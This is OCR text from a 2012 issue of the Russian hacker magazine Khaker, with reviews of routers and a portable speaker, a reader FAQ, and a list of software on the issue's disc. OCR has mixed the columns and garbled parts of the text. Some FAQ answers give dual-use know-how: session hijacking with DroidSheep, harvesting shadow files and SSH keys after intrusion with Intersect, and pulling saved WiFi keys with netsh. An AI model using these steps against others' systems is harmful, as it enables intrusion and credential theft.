стойки, переднее расположение разъемов и два WAN-порта – все
это фичи промышленного масштаба. Однако D-Link DSR-500N
оснащен USB-портом и модулем Wi-Fi (в крупных сетях чаще
используются отдельные точки доступа), больше подходящими
для дома и малого офиса. Таким образом, мы получаем гибрид,
сочетающий в себе функционал как для дома, так и для большого
офиса, и при этом обладающий железом, которое может выдержать
серьезную нагрузку.
Настройка D-Link DSR-500N аналогична настройке остальных
продуктов D-Link. Основные параметры может сконфигурировать
и новичок, благо присутствует мастер пошаговой настройки интер-
нета и сети Wi-Fi. Описание всего функционала данного девайса
не укладывается в формат статьи, так что скажем лишь, что вряд
8000 ли найдется человек, которого не устроят возможности D-Link
РУБ. DSR-500N.
Все бы хорошо, но большую ложку дегтя добавляет сырая про-
шивка. Правда, инженеры D-Link заявляют, что в скором времени
все будет исправлено. Хотелось бы верить, ведь такие несерьезные
показатели работы по PPTP и Wi-Fi смотрятся на фоне реальной
производительности устройства просто смешно.

NETGEAR WNDR4000
лавные формы, черный глянцевый пластик, мягкие, не
П раздражающие светодиоды… Узнаешь? Правильно, оче-
редной продукт от NETGEAR – роутер WNDR4000. Устрой- 6000
ство обладает хорошей производительностью, надежно и легко РУБ.
настраивается. Несмотря на то, что это общие слова, NETGEAR
действительно с каждой моделью совершенствует свои показате-
ли производительности. Данный роутер стал очередной ступенью
в линейке высокопроизводительных устройств. Роутер порадовал
отличными скоростями PPTP и NAT. Производительность беспро-
водной сети оказалась на уровне выше среднего. Также NETGEAR
WNDR4000 оснащен USB-портом, к которому может быть подклю-
чен накопитель для общего доступа по сети. Подойдет для тех, кто
превыше всего ценит надежность.

ТЕХНИЧЕСКИЕ NETGEAR
ASUS RT-N66U D-Link DSR-500N
ХАРАКТЕРИСТИКИ WNDR4000

Интерфейсы: 1x WAN (RJ-45) 10/100/1000 Мбит/сек, 4x 2x WAN (RJ-45) 10/100/1000 Мбит/сек, 4x LAN 1x WAN (RJ-45) 10/100/1000 Мбит/сек, 4x LAN
LAN (RJ-45) 10/100/1000 Мбит/сек (RJ-45) 10/100/1000 Мбит/сек (RJ-45) 10/100/1000 Мбит/сек
Беспроводная точка доступа Wi-Fi: IEEE 802.11n IEEE 802.11n IEEE 802.11 a/b/g/n
Частотный диапазон: 2.4 ГГц, 5 ГГц 2.4 ГГц 2.4 ГГц, 5 ГГц
Безопасность: WEP, WPA/WPA-PSK, WPA2/WPA2-PSK WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP, WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
(TKIP, AES) AES) AES)
Функции роутера: NAT, DynDNS, Static Routing, DHCP, QoS NAT, DynDNS, Static Routing, DHCP, QoS NAT, DynDNS, IPTV, Static Routing, DHCP, QoS
Поддержка соединений: PPPoE, PPTP, L2TP, Static/Dynamic IP PPPoE, PPTP, L2TP, Static/Dynamic IP PPPoE, PPTP, L2TP, Static/Dynamic IP
Дополнительно: EZSetup, WPS, медиа-сервер UPnP, WPS, 1x USB, управление через консоль, Дополнительно: WPS, счетчик трафика, 1x USB
AiDisk, 2x USB технология Green

136 ХАКЕР 04 /159/ 2012

 Сетевой форсаж

ZYXEL KEENETIC GIGA

мя ZyXEL хорошо известно в кругу людей, которые еще помнят,
И что такое доступ в интернет через Dial-Up. По сей день ком-
пании удается держать марку и выпускать хорошие роутеры.
На этот раз в нашей лаборатории оказался ZyXEL Keenetic Giga. Теперь
поклонники линейки Keenetic могут радоваться появлению модели
с гигабитным коммутатором и двумя разъемами USB для подключе-
ния накопителей или, например, принтера. Устройство по-прежнему
обладает несколькими видами подключений к провайдеру — по вы-
деленной линии, через 3G/4G-модем и по Wi-Fi. Также Keenetic Giga
может работать в режиме точки доступа и моста беспроводной сети.
Приобретая этот роутер, ты можешь быть уверен на 99.9%, что у тебя не
возникнет проблем с подключением к какому-либо провайдеру, при-
чем не только интернет-, но и IPTV-провайдеру.
3300
РУБ.
Веб-интерфейс – просто песня. Например, на главном экране показана
исчерпывающая информация, даже таблица маршрутов поместилась.
Сама «админка» довольно шустрая, а настройки применяются за счи-
танные секунды. Что касается скоростных показателей, то скорость
NAT на очень приличном уровне, а при использовании PPTP она просе-
дает до средних показателей. Производительность беспроводной сети
также уверенно держится средних показателей.

TP-LINK TL-WR1043ND
первую очередь этот роутер будет интересен тем, кто умеет
В считать деньги. TP-Link TL-WR1043ND – самое дешевое
устройство из нашего теста, при этом обладает гигабитным
коммутатором и USB-портом. Однако данная модель показывает не са-
мые высокие скорости. Тут важно понять, что ты хочешь от устройства:
работу «из коробки» и высокую производительность или длительную
установку и настройку сторонней прошивки? Если выбрать первый
вариант, то на сегодняшний день для TP-Link TL-WR1043ND выпу-
стили стабильную прошивку, которая дружелюбна, имеет неплохой
набор функций и не зависает. Выбирая второй вариант, ты получаешь
2000 больший функционал (например, возможность подключить принтер
РУБ.
к USB-порту), однако сторонние прошивки совсем не гарантируют
стабильной работы. Решать тебе, но в любом случае мы можем смело
утверждать, что в данном ценовом сегменте устройство выглядит
очень привлекательно. Из недостатков стандартной прошивки можно
отметить долгое применение настроек.

ВЫВОДЫ
Итак, если ты все еще сомневаешься в своем решении,
TP-Link TL- ZyXEL Keenetic
WR1043ND Giga то мы тебе поможем. Взяв на вооружение ASUS RT-N66U,
ты получишь высокопроизводительное и функцио-
нальное устройство — девайс имеет хороший запас по
скорости, который — мы уверены — станет еще больше
1x WAN (RJ-45) 10/100/1000 Мбит/сек, 1x WAN (RJ-45) 10/100/1000 Мбит/сек,
4x LAN (RJ-45) 10/100/1000 Мбит/сек 4x LAN (RJ-45) 10/100/1000 Мбит/сек после выхода новых прошивок. ASUS RT-N66U получает
IEEE 802.11a/b/g/n IEEE 802.11n «Выбор редакции».
2.4 ГГц 2.4 ГГц
WEP, WPA/WPA-PSK, WPA2/WPA2- WEP, WPA/WPA-PSK, WPA2/WPA2- Звание «Лучшей покупки» присваивается роутеру ZyXEL
PSK (TKIP, AES) PSK (TKIP, AES) Keenetic GIGA за его «всеядность» и хорошую производи-
NAT, DynDNS, Static Routing, DHCP, NAT, DynDNS, Static Routing, DHCP, тельность. NETGEAR WNDR4000 впишется там, где нужна
QoS QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP PPPoE, PPTP, L2TP, Static/Dynamic IP производительность и стабильность. Ну а модель TP-
Дополнительно: WPS, 1x USB WPS, TVport, 2x USB Link оказалась не только очень стабильной, но и самой
доступной во всем тесте. z

ХАКЕР 04 /159/ 2012 137

FERRUM

ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 1 М, МБИТ/С

ASUS RT-N66U

D-Link DSR-500N

NETGEAR WNDR4000

TP-Link TL-WR1043ND

ZyXEL Keenetic GIGA

FDX
Downstream
Upstream 0 10 20 30 40 50 60 70 80 90 100 110 120 130 140
Наглядное превосходство 5 ГГц канала. Что касается 2.4 ГГц, то впереди всех ASUS RT-N66U

ПРОИЗВОДИТЕЛЬНОСТЬ PPTP, МБИТ/С ПРОИЗВОДИТЕЛЬНОСТЬ NAT, МБИТ/С

ASUS RT-N66U ASUS RT-N66U

D-Link DSR-500N D-Link DSR-500N

NETGEAR WNDR4000 NETGEAR WNDR4000

TP-Link TL-WR1043ND TP-Link TL-WR1043ND

ZyXEL Keenetic GIGA ZyXEL Keenetic GIGA

FDX FDX
Downstream
Upstream 0 50 100 150 200 250 300 Downstream
Upstream 0 500 1000 1500
Даже ASUS RT-N66U выглядит слабым на фоне Netgear WNDR4000 Скорее бы и другие показатели D-Link DSR-500N были схожи с данными при тесте NAT

ПРОИЗВОДИТЕЛЬНОСТЬ WI-FI, 6 М, МБИТ/С

ASUS RT-N66U

D-Link DSR-500N

NETGEAR WNDR4000

TP-Link TL-WR1043ND

ZyXEL Keenetic GIGA

FDX
Downstream
Upstream 0 10 20 30 40 50 60 70 80 90
На удалении скорость уменьшилась пропорционально – вполне закономерно

138 ХАКЕР 04 /159/ 2012

FERRUM

EDIFIER 1200
РУБ.

MP15 PLUS
ТЕХНИЧЕСКИЕ Представим картину: счастливчик, купивший новый
ПРОСТО
КОНФЕТКА!
ством идут все необходимые кабели, а также чехол для
ХАРАКТЕРИСТИКИ: ноутбук, возвращается домой. Зажарив в микроволновке транспортировки.
гору поп-корна и приготовив сладкой колы со льдом, он Вообще существует множество портативных систем для
Выходная мощность: 1.2х2 Вт
Диапазон воспроизводимых включает фильм, который давно хотел посмотреть. Каза- воспроизведения звука, но EdifierMP15 Plus хорошо сба-
частот: 100-20000 Гц лось бы — идиллия. Но на протяжении всего просмотра лансирована в плане функционала и удобства. Такую ко-
Динамики:
• диаметр: 40 мм
не покидает ощущение, что что-то не так. А все из-за лонку можно везде возить с собой — карман оттягивать
• магнитное экранирование: 6 Ом звука, доносящегося из «недодинамиков», встроенных не будет, так как весит всего 200 грамм. Также можно не
Входная чувствительность: в ноутбук. Конечно, динамики лэптопов класса Hi-End бояться повредить мембрану динамика — она защищена
450 мВ
Входной импеданс: 10 кОм позволяют с комфортом посмотреть фильм и даже послу- пластиковой дугой.
Управление: селектор шать музыку, но что делать обладателям более демо- Звук у EdifierMP15 Plus такой, какой и должен быть
входа, воспроизведение/ кратичных моделей? Ответить на этот вопрос поможет у портативной колонки. В меру громкий, не перегружен-
пауза, переключение треков
и радиостанций, громкость продукт компании Edifier. ный, без завышенных верхних частот. Эта система может
Режимы работы: 3.5 мм Edifier MP15 Plus или Edifier Audio Candy Plus – это порта- с лихвой заменить множество настольных вариантов
стерео вход, воспроизведение
с SD-карты, FM-радио
тивная акустическая система — миниатюрное устрой- фирмы «ноунейм» большего размера. Для оценки звуча-
Габариты: 200х60х33 мм ство приятного дизайна. К нам в тестовую лабораторию ния мы использовали список треков, в который входили
Масса: 0.2 кг попал семпл черного цвета, но данная модель представ- песни разных стилей и фильмы. Понятно, что прослуши-
лена в различных цветовых вариантах на любой вкус. вание lossless-форматов на этом устройстве бессмыс-
Система имеет несколько режимов работы. Первая и, ленно, поэтому все звуковые дорожки воспроизводились
пожалуй, самая главная функция — это воспроизве- в формате MP3. В качестве источника звука использова-
дение музыки через линейный вход. Питается система лись ноутбук Toshiba Satellite L635-12Qи iPod nano 5G.
от встроенного аккумулятора, а заряжается — от USB.
Второй и третий режимы — FM-приемник и воспроизве- ВЫВОДЫ
дение музыки с SD-карты соответственно. Пока меломаны сравнивают количество золота в своих
Настройка и управление системой происходят посред- проводах, обычные юзеры уже выбрали Edifier MP15
ством набора клавиш, расположенных в ряд вверху Plus в качестве портативной акустической системы для
устройства. Радует, что девайс снабдили небольшим ноутбука. Что же мы получаем? В первую очередь, воз-
дисплеем, на котором отображается нужная информа- можность смотреть фильмы и слушать музыку в разы
ция – например частота радио и имя воспроизводимого комфортнее и громче, чем через встроенную систему.
трека. Функции стандартны и не отличаются от большин- Во-вторых, карманное радио с плеером для выходов на
ства оных у обычных портативных плееров, за исключе- природу.
нием того, что радио может работать без подключения Таким образом, после знакомства с Edifier MP15 Plus
наушников в качестве антенны. В комплекте с устрой- осталось только хорошее впечатление. z

ХАКЕР 04 /159/ 2012 139

UNITS / FAQ UNITED Коллективный разум

FAQ United
ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ
НА [email protected]

Установил Windows 8 Consumer 1. Через «Автозагрузку». (twistedmatrix.com/trac/wiki/TwistedWords),

Q Preview, которую Microsoft только что Заходим в папку C:\Users\<User Profile>\ Wokkel (wokkel.ik.nu), SleekXMPP (code.
вытащила из печки и еще тепленькой AppData\Roaming\Microsoft\Windows\ google.com/p/sleekxmpp) — это, пожалуй,
представила публике. Все отлично работает, Start Menu\Programs\Startup и добавля- наиболее успешные, но далеко не все.
но один момент — сильно коробит отсут- ем там ярлык, ссылающийся на «explorer. Помимо этого есть замечательный сервис
ствие кнопки «Пуск». Как же ее вернуть на exe shell:::{3080F90D-D7AD-11D9-BD98- IMified (imified.com), позволяющий работать
место, назло предприимчивым парням из 0000947B0257}». с разными сетями через специальный HTTP
Microsoft, которые везде толкают свой 2. Через стандартный планировщик. API.
Metro-интерфейс? Нажимаем Win-R и через «Выполнить»
запускаем taskschd.msc. Далее создаем но- Как быстро запустить на своем
Выручит давно известная утилита вую задачу, кликнув на «Create task». Важно Q ноутбуке виртуальную точку доступа?
A ViStart (lee-soft.com/vistart), которая сделать так, чтобы задача выполнялась на В качестве ОС используется Windows.
изначально разрабатывалась для старушки старте системы, поэтому добавляем триггер
Windows XP, чтобы реализовать в ней меню (Triggers Æ New), выбирая «Begin the task: At Существует огромное количество
«Пуск» новомодных на то время Vista/ log on» и устанавливая небольшую задержку A специальных утилит, о которых мы уже
Windows 7. По иронии судьбы она отлично («Delay task for: 5 seconds»). В качестве дей- писали. Например, WiFi HotSpot Creator
работает и в новой «восьмерке». Правда, ствия выбираем запуск программы («Action: (wifihotspotcreator.com) позволяет реализо-
иконка «Пуск» будет накладываться на Start a program») и в качестве приложения вать это буквально в два клика. Нужно лишь
другие элементы таскбара, что легко указываем «explorer.exe shell:::{3080F90D- указать SSID, парольную фразу для WPA2
исправить, если через контекстное меню D7AD-11D9-BD98-0000947B0257}». и выбрать сетевой интерфейс с выходом
«Добавить в панель задач» создать дополни- в инет, чтобы расшарить подключение
тельный пустой тулбар. Инструкция Для довольно посещаемого сервиса к внешней сети.
в картинках здесь: bit.ly/w7gsxv. Q хочу запустить Jabber-бота. Нагрузка
ожидается приличная, поэтому сразу Выбираю наиболее безопасный
Как сделать так, чтобы в Windows 8 по хочется сделать по уму. Есть ли какие-то Q мессенджер, который обеспечивал бы
Q умолчанию запускался не Metro- готовые решения и заготовки, которые я шифрование трафика. Какие есть вариан-
интерфейс, а нормальный рабочий стол? смогу использовать? ты?

Необходимо сделать так, чтобы на Существует огромное количество A: Можно не сильно морочить себе
A старте системы запускался нужный A библиотек для XMPP-протокола, в том A голову и использовать привычный
шелл. числе, например, для Python. Twisted Words Jabber. Во-первых, большинство серверов

КАК ОТЛАДИТЬ JS-КОД НА МОБИЛЬНОМ УСТРОЙСТВЕ?

ы стремительно приближаемся к тому сценарий или на лету поправить какие-нибудь Существует такой проект как weinre
М моменту, когда большинство людей
будут выходить в интернет не с ком-
параметры в DOM-модели страницы, но, увы,
мобильных версий этих инструментов пока (и я
1 (phonegap.github.com/weinre), кото-
рый очень похож на FireBug и Web
пьютеров, а с мобильных планшетов и смарт- уверен, что только пока) нет. Впрочем, с учетом Inspector, но обладает одним важным отличием
фонов. Возрастает сложность мобильных огромного количества разработок в этой об- — он предназначен для удаленной отладки
версий сайтов, но и их разработка усложня- ласти, было бы странно, если разработчики и, в частности, позволяет выполнять отладку
ется тем, что для браузеров в Android и iOS не нашли бы подходящих альтернатив. Их страниц на мобильных устройствах. Таким
нет таких мощных инструментов как Firebug несколько. Причем разрабатываются они как образом, дебаггер может быть запущен на
(аддон для Firefox) или Web Inspector (опция просто энтузиастами, так и гигантами вроде компьютере, а отлаживаемая страница ото-
WebKit-браузеров), которые программисты ис- Adobe. бражаться, скажем, на смартфоне. Сейчас под-
пользуют для отладки сложного JS-кода. Нет держиваются Android, iOS, BlackBerry, webOS.
более удобного способа пошагово выполнить

140 ХАКЕР 04 /159/ 2012

 FAQ UNITED

сейчас поддерживают работу через

безопасное SSL-соединение (даже если ты
используешь GTalk через браузер, весь БОЛЬШОЙ ВОПРОС
трафик по умолчанию идет по HTTPS).
Во-вторых, в большинстве клиентов можно
включить шифрование через OTR (Off-the- В ЧЕМ СМЫСЛ ПРОТОКОЛА Цель разработчиков SPDY — уменьшить
Record). Это протокол шифрования сообще-
ний для сетей обмена мгновенными
Q SPDY, ПРОДВИГАЕМОГО
СЕЙЧАС GOOGLE, И К АК ЕГО
время загрузки страницы на 50% без
необходимости менять сетевую инфра-
сообщениями. Основные свойства протоко- МОЖНО ИСПОЛЬЗОВАТЬ? структуру (для этого он работает поверх
ла: привычного TCP). Для этого разработчики
• шифрование сообщений — никто иной не SPDY (произносится как «спиди») реализовали возможность передачи не-
сможет прочитать переписку;
• аутентификация пользователей — уве-
А — это экспериментальный сетевой
протокол, который разрабаты-
скольких HTTP-запросов в одном пакете,
ввели сжатие заголовков, отказавшись
ренность в том, кто является собеседни- вается в Google и активно продвигается при этом от избыточности (к примеру,
ком; в качестве замены устаревшему HTTP. клиенту необязательно каждый раз пере-
• сложность в дешифровке — даже если Важно, что это не просто проект (хотя про- давать свой User-Agent), реализовали
потеряны секретные ключи, прошлая токол еще находится в стадии черновика) возможность инициировать передачу
переписка не будет скомпрометирована; — это уже работающая технология. Его уже данных со стороны сервера и отдавать
• возможность отречения — третье лицо не сейчас поддерживают браузеры Google данные клиенту тогда, когда это необхо-
сможет доказать, что сообщения написаны Chrome и последняя версия Firefox, с его димо. Очень подробно и доходчиво об этом
кем-либо другому адресату. помощью отдают HTTP-контент некоторые пишет сам Google (chromium.org/spdy/
сервисы Google (например, Gmail), а также spdy-whitepaper), где он делится резуль-
OTR поддерживается (по умолчанию или Twitter. татами бенчмарков, демонстрирующих
с помощью плагинов) в Adium, Pidgin, Kopete, Разработанный в начале 90-х годов про- эффективность SPDY. Там же очень скоро
Miranda IM, Trillian, qutIM, Psi+ и прочих. токол HTTP хотя и справляется с задачей будут доступны исходники веб-сервера,
по доставке содержимого веб-страниц, поддерживающего SPDY. Сейчас же экс-
Какие инструменты можно использо- но делает это не оптимально. Один запрос периментальный модуль для поддержки
Q вать для деобфускации JavaScript- на одно TCP-соединение, возможность протокола доступен для Apache (code.
кода HTML-страницы и, прежде всего, инициировать подключение только со google.com/p/mod-spdy), есть открытый
зловредной нагрузки (уж кто-то, а плохие стороны клиента, несжатые и к тому же проект на Python (github.com/mnot/nbhttp/
ребята всегда прибегают к обфускации)? избыточные заголовки запросов и от- tree/spdy). Для Chrome, к слову, можно
ветов — все это накладывает серьезные поставить аддон (bit.ly/xldeGj), который
Как известно, JavaScript-код, накладные расходы на доставку содержи- в адресной строке отображает, по какому
A особенно зловредный, нередко мого страниц, которая выражается в уве- протоколу передаются данные — HTTP
вставляется в обфусцированном (намеренно личенном времени загрузки страницы. или SPDY.
запутанном) виде — ты можешь его прочи-
тать, но его логику понять без обработки
невозможно. В нормальный вид он преобра-
зуется браузером уже во время выполнения.
Существует немало инструментов, позво-
ляющих выполнить деобфускацию JS-кода
— например, Malzilla (malzilla.sourceforge.
net). В Сети можно найти достаточно
примеров, как с ее помощью восстанавлива-
ется исходный код боевых нагрузок
(пейлоадов) различных сплоитов и сплоит-
паков. Встроенная в Chrome утилита (чтобы ее запустить, достаточно набрать в адресной строке: chrome://net-inter-
nals) подтверждает работу некоторых сайтов через SPDY.

Компания Adobe в рамках своего Помимо этого можно использо- В качестве удаленной JavaScript-
2 проекта Adobe Lab недавно опублико-
вала инструмент Adobe Shadow (labs.
3 вать удаленную JavaScript-консоль
(jsconsole.com) — правда, для этого
4 консоли также можно использовать
проект RemoteJS (bit.ly/wF63OE).
adobe.com/technologies/shadow). С помощью ее код придется предварительно вставить Проект имеет две версии: первая реализована
этого инструмента можно связать между собой в отлаживаемую страницу. При открытии стра- в виде GUU-приложения, вторая же написа-
браузер на компьютере (пока поддержива- ницы специальный сниппет будет стучаться на на на Python и работает в консоли. Правда,
ется только Chrome) и браузер на мобильном сервер и передавать отладочную информацию. в списке поддерживаемых мобильных плат-
устройстве (операция называется pairing). Процесс отладки соответственно осуществля- форм пока только Android. Зато этот вариант
Таким образом удается добиться синхронизи- ется через консоль. На сайте есть отличная рекомендуют разработчики Sencha — извест-
рованного серфинга и обновления просматри- инструкция (jsconsole.com/remote-debugging. ного фреймворка, реализующего интерфейс
ваемых страниц одновременно на компьютере html) о том, как выполняется удаленная от- мобильных приложений на HTML5.
и, к примеру, планшете. ладка.

ХАКЕР 04 /159/ 2012 141

UNITS / FAQ UNITED

Можно ли запустить утилиты для 2. Открыть меню «Debug» и выбрать там Подскажи: как максимально быстро
Q прослушивания беспроводного эфира «Command line...». Q можно собрать информацию о Linux-
и инъектирования произвольных пакетов 3. В консоли выполнить команду системе, к которой был получен доступ.
(например, aircrack-ng) под Android? «.pgmphystofile <filename>», указав, куда
именно нужно сохранить dump. Инструментов для постэксплуатации
На известном форуме xda-developers. A Linux-систем довольно много, в том
A com, где обитают разработчики Анализ в свою очередь можно осуще- числе и в публичном доступе.
кастомных прошивок и различных хаков для ствить с помощью известного фреймвор- Правда, надо иметь в виду, что подобные
мобильных устройств, есть несколько тем по ка Volatility (code.google.com/p/volatility). утилиты могут сливать полученную инфор-
тому, как можно внести необходимые патчи Есть также решения вроде Passware мацию «налево». Из функциональных тулз
в ядро Android и благодаря этому запустить (lostpassword.com/kit-forensic.htm), позво- можно выделить Intersect, полностью напи-
airodump и aircrack-ng (например, bit.ly/ ляющие извлечь из таких дампов различные санную на Python. Ничего сверхъестествен-
znrtiB). Однако, во-первых, предложенные пароли. ного она не делает, но упрощает массу задач,
действия — нетривиальны, а во-вторых, которые пришлось бы выполнять вручную.
подойдут не для любой платформы. Поэтому Есть точка доступа, пароль для Утилита соберет файлы с паролями (passwd,
если необходимо просто отснифать трафик Q которой устанавливал предыдущий shadow, gshadow, master.passwd), скопирует
в беспроводной сети, то можно воспользо- админ. Существует ли какой-нибудь способ SSH-ключи (открытые и секретные), со-
ваться связкой утилит DroidSheep восстановить пасс, кроме как найти этого берет информацию о запущенных процессах
(droidsheep.de) и Shark for Root (bit.ly/ самого админа? и установленных приложениях, вытащит
wpexhA). Первая, напомню, выполняет ARP историю Bash и задачи планировщика,
Spoofing и извлекает из эфира пользова- Универсального способа нет, и более просканирует внутреннюю сеть на «живые»
тельские сессии (например, для ВКонтакте). A того — очень часто это невозможно. хосты, попробует определить установленные
Вторая же позволяет сохранить перехвачен- Однако все сильно зависит от роутера в системе антивирусы и файрволы. Это лишь
ные данные в PCAP-формате, которые позже и прошивки, которая в нем используется. малая часть функционала.
можно проанализировать, например, Например, для ASUS WL-500gP пароль
с помощью Wireshark. вытащить удалось, в чем мне помог один пост Как вытащить ключи для безопасной
на форуме (wl500g.info). Для этого, правда, Q беспроводной сети, сохраненные
Как выполнить дамп оперативной пришлось скачать прошивку OpenWRT (в ней в Windows-системе?
Q памяти виртуальной машины, по умолчанию включен telnet) и загрузить
пригодный для последующего анализа? через механизм безопасного обновления Как вариант можно воспользоваться
firmware (необходимо отключить питание A утилитой вроде WirelessKeyView
В случае с VMware все проще простого: роутера, зажать кнопку «reset settings» (nirsoft.net/utils/wireless_key.html), которая
A для каждого snapshot’а, созданного и включить роутер, после чего тот получает без труда извлечет их из системы и расшиф-
для виртуальной машины, есть файл адрес 192.168.1.1 и позволяет залить прошивку рует. Но есть способ обойтись и без сторон-
с расширением .vmem — это и есть дамп через ftp). Весь секрет в том, что даже после них инструментов. Подсистема Windows
памяти. В случае с VirtualBox’ом можно перезагрузки предыдущие настройки Wireless Zero Configuration (та, которая
поступить следующим образом. остаются в nvram. Получается, что можно отвечает за беспроводные подключения)
залить новую прошивку, зайти с логином- хранит настройки подключения в профилях.
1. Запустить виртуальную машину через паролем по умолчанию и посмотреть предыду- Их список можно получить, набрав команду:
консоль с параметрами: щие настройки простой командой «nvram
show». Но, опять же, это лишь один конкрет- netsh wlan show profiles
VirtualBox --dbg --startvm <VM name> ный случай.
Любой профиль можно экспортировать,
чем мы и воспользуемся:

netsh wlan export profile name="<имя

профайла>"

В результате будет создан XML-файл,

где буду т сохранены настройки для
конкретного соединения, включая ключ
(правда, в зашифрованном виде). Что
с этим делать? Во-первых, профайл можно
импортировать в другой системе и таким
образом получить готовые настройки для
подключения к сети!

netsh wlan add profile filename="<имя

файла с профайлом.xml"

Но это еще не все. Если после импорта

профайла открыть настройки подключения
и перейти на вкладку «Безопасность», то
ты увидишь поле для ввода ключа, запол-
ненное звездочками. И теперь, внимание,
магия! Рядом же есть галочка, позволяющая
Weinre очень похож на FireBug и Web Inspector, но предназначен для удаленной отладки отобразить все символы ключа :). z

142 ХАКЕР 04 /159/ 2012

>>WINDOWS Spiffy 0.5.11 >Devel >Server
>Development The Dude 3.6 Anjuta 3.2.2 Apache 2.2.22
Dependency Walker 2.2 TightVNC 2.0.4 Execline 1.1.3 Asterisk 10.1.3 ”Ÿ°¦™¤¡”¦œ–¡”³
£¤¢¬œ–ž”
˜Ÿ³
"/%30*% 

DJ Java Decompiler 3.12.12.96 UltraSurf 11.04 Highlight 3.7 Bind 9.8.1-p1

Free JavaScript Editor 4.7 Wuala Kotlin 0.1.429 Cups 1.5.2
Frhed 1.6.0 Lgi 3.4.0 Dhcp 4.2.3-p2
HxD 1.7.7.0 >Security Libpki 0.6.7 Dovecot 2.1.1 š § ¤ ¡ ” Ÿ
¢ ¦
ž ¢   £ ° ² ¦ ™ ¤ ¡ ¯ ©
© § Ÿ œ —” ¡ ¢ –
KompoZer 0.8b3 AJAX Crawling Tool Libpng 1.5.9 Freeradius 2.1.12
Microsoft Visual Studio 11 Beta BFT - Browser forensic tool Lrc 0.7 Lighttpd 1.4.30
NSIS 2.46 Browser Forensic Tool Lua 5.2.0 Mysql 5.5.21
PHP 5.4.0 Browzar 2.0 Mahout 0.6 Nsd 3.2.10 $UCK$UCK'Oç
8889",&136
py2exe 0.6.9 codesensor Mono 2.10.8 Openldap 2.4.29 ¦'OOGLEçÐÊÄÃÇÑç
RapidSVN 0.12 CodeSensor 0.1 Netty 3.3.1 Openvpn 2.2.2 Æ¿çÑÍÀÍÈçËÚç°çÌÄѧ

RubyMine 4.0 DPScan Opentbs 1.7.5 Postfix 2.9.1 


 ¥–¢
”Ÿ—¢¤œ¦ 
˜Ÿ³
536&$3:15
SWI-Prolog 6.0.1 FuzzOps-NG Panda3d 1.8.0 Postgresql 9.1.2
TextPad 5.4.2 Fuzzware 1.5 Parrot 4.0.0 Pure-ftpd 1.0.35 odimkdlcma_ll_~ç
TortoiseSVN 1.7.5 Heimdal Rails 3.2 Samba 3.6.3 ª™¡”

Ä
Xdebug 2.1.3 IronWASP Sabredav 1.5.7 Sendmail 8.14.5
MagicTree 1.1 Ujorm 1.22 Snort 2.9.2.1
>Misc mimikatz 1.0 Wro4j 1.4.4 Sqlite 3.7.10
Aard Dictionary 0.9.3 Nessus 5.0 Squid 3.1.19
AllDup 3.4.0 PEBrowse Professional 10.1.4 >Net Syslog-ng 3.3.4
DisplayFusion 3.4.1 SIPVicious 0.2.7 Ajaxplorer 4.0.3 Vsftpd 2.3.5
mn_plzh
Evernote 4.5.3.6131 uniofuzz Bitlbee 3.0.5
Everything 1.2.1.371 Uniofuzz 0.1.2 Chrome 17.0.963 >System 
FilePro 1.0 untidy Dxirc 1.00.0 Alsa 1.0.25 camhlgi
HoeKey 1.13 untidy beta 2 Gfeedline 1.0 Bcfg2 1.2.1
Ÿ™—žœ
¥£¢¥¢•
£¢˜˜™Ÿžœ

HotKey Resolution Changer 1.5 Gnubiff 2.2.14 Clonezilla 1.2.12-10
ž¢¡¦¤¢Ÿ°¡¢
¥§  ¯
œ
±ª£

LastPass 1.90 >System Leechсraft 0.5.0 Fuse-exfat 0.9.6 ¥
£¢ ¢­°²
ž¢ŸŸœ›œ
Process Blocker 0.7b ClipboardZanager 1.0 Liferea 1.8.0 Kccmp 0.3
PyCmd 0.8 CPU-M Benchmark 1.0 Nat-traverse 0.5 Limitcpu 1.5
RegScanner 1.85 DHE Drive Info 3.2.493 Pcapsipdump 0.2 Mesa 8.0
StExBar 1.8.3 Disk Bench 2.6.2.0 Qtm 1.3.7 Mondorescue 3.0.0
Synergy 1.3.8 Disk Investigator 1.31 Rdp-runner 0.1.17 Nvidia 295.20
timeEdition 1.1.6 DriverIdentifier 3.9 Sflphone 1.0.2 Pf-kernel 3.2.5
Workrave 1.9.4 DSynchronize 2.30.2 Spgt 0.7.1 Procmeter3 3.6
File Extension Monitor 1.4 Tomuss 3.1.7 Quotatool 1.4.12
>Multimedia MouseWrangler 1.0.2 Uhub 0.3.2 Rally 0.5.5
1by1 1.75 NTFS Permissions Reporter 1.0.0 W3perl 3.141 Spacewalk 1.6
Audacity 1.3.14 Process Explorer 15.13 Yate 4.0.0 Wayland 0.85.0
AutoBrake 1.07 Simple Data Backup 7.0
CamSpace 8.95 Startup Master >Security >X-distr
Capture2Text 1.10 System Ninja 2.3.1.0 Afick 2.20 CentOS 5.8
Format Factory 2.90 USB Oblivion 1.7.0.0 AlienVault
№ 04(159) АПРЕЛЬ 2012

Free Audio Editor 2012 Windows Surface Scanner 2.20 Bluelog 1.0.2 >>MAC

mpTrim 2.13 codesensor Cathode 1.2.0
music2pc 2.12 >>UNIX DotDotPwn 3.0 Docker 1.6.7 _jdip_lcoç
Picasa 3.9 >Desktop DPScan Gruml 1.1 b_jguigh
SkypeAutoRecorder Bib2xhtml 3.0 FuzzOps-NG HyperDock 1.2 gledldoç
Songr 1.9.33 Blender 2.62 Fwknop 2.0 iZip Archiver 1.4 `gfldpkdlç
TagScanner 5.1.610 Brl-cad 7.20.4 Gnupg 2.0.18 KeyRemap4MacBook 7.5.0 gladpqmo
Tunatic 1.0.1b Ccextractor 0.60 Heimdal Mouse Server 2.6.9 

VideoInspector 2.3.0.126 Cdcat 1.8 Nessus 5.0 Notify 2.1

VLC 2.0 Cdemu 1.5.0 Netifera 1.0 Prey 0.5.3 3()-ç%.').%çlmazhç
Cinnamon 1.2 Reaver 1.4 Private Eye 1.0 pnmpm`çaldcodlg~çimc_ç
>Net Libreoffice 3.5.0.3 Samhain 3.0.2 Que 1.3.1 gç_aqmf_borfig
AutoPuTTY 0.24.2 Libvpx 1.0.0 sipvicious 0.2.7 RCDefaultApp 2.1 

Awasu 3.0 Macrofusion 0.7.3 THC-HYDRA v7.2 Resuminator 1.0

Cookienator 2.6.41 Mapsurfing Tor 0.2.2.35 Syrinx 2.5.0 |ipnjr_qgordkçpgpqdkrç
